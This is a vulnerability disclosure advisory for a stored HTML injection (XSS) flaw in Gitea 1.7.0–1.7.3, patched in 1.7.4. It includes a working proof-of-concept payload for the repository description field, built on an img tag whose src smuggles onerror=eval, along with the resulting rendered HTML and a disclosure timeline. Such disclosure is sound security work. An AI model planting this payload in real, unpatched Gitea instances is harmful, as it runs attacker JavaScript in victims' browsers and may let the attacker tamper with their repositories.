Gitea 1.7.3 stored HTML injection (XSS) ####################################### Information =========== Name: Gitea 1.7.0 - 1.7.3 stored HTML injection Software: Gitea - a self-hosted Git service Homepage: https://gitea.io/ Vulnerability: stored HTML injection Affected: 1.7.0 - 1.7.3 Tested: 1.7.2, 1.7.3 Fixed: 1.7.4 Prerequisites: edit repository settings Severity: low CVE: NA Credit: Anti RA$?is HTML version: https://bitflipper.eu/ Description =========== Gitea is a self hosted git repository service, which is affected by stored HTML injection vulnerability, allowing authenticated user to inject payload into repository's description field. It is executed, when victim navigates to malicious repository's code page. Proof of Concept ================ Attacker needs to create a new public repository and set the description containing payload. ==================== source start ======================== <img id="xss" src="http://onerror=eval( document.querySelectorAll('span')[10].innerText)//"> <span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span> ==================== source end ======================== Code is executed, when victim navigates to malicious repository's code page. Following HTML snippet demonstrates the issue: ==================== source start ======================== <div id="repo-desc"> <span class="description has-emoji"><img id="xss" src="<a href="http://onerror=eval( document.querySelectorAll(&#39;span&#39;)[10].innerText)//">" target="_blank" rel="noopener noreferrer">http://onerror=eval( document.querySelectorAll(&#39;span&#39;)[10].innerText)//"></a> <span> document.querySelector(&#39;#xss&#39;).parentNode.innerHTML=&#39;\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e&#39;;alert(&#39;XSS&#39;)</span> </span> <a class="link" href=""></a> </div> ==================== source end ======================== Impact ====== Authenticated attacker can execute JavaScript in the victim's browser and possibly use it to change code in victim's repository. Conclusion ========== New release was published as a result and vulnerability is patched in Gitea 1.7.4. References ========== 1) New release announcement https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/ 2) Patch pull request on github https://github.com/go-gitea/gitea/pull/6306 Timeline ======== 28.02.2019 | me | vulnerability discovered 28.02.2019 | me > developer | sent report to the developers; no response 06.03.2019 | me > developer | asked for status update 06.03.2019 | developer > me | answer to status update: they are working | | on a patch 13.03.2019 | developer > public | patched version released 17.03.2019 | me > public | published vulnerability details --- Anti RA$?is Blog: https://bitflipper.eu Pentester at http://www.clarifiedsecurity.com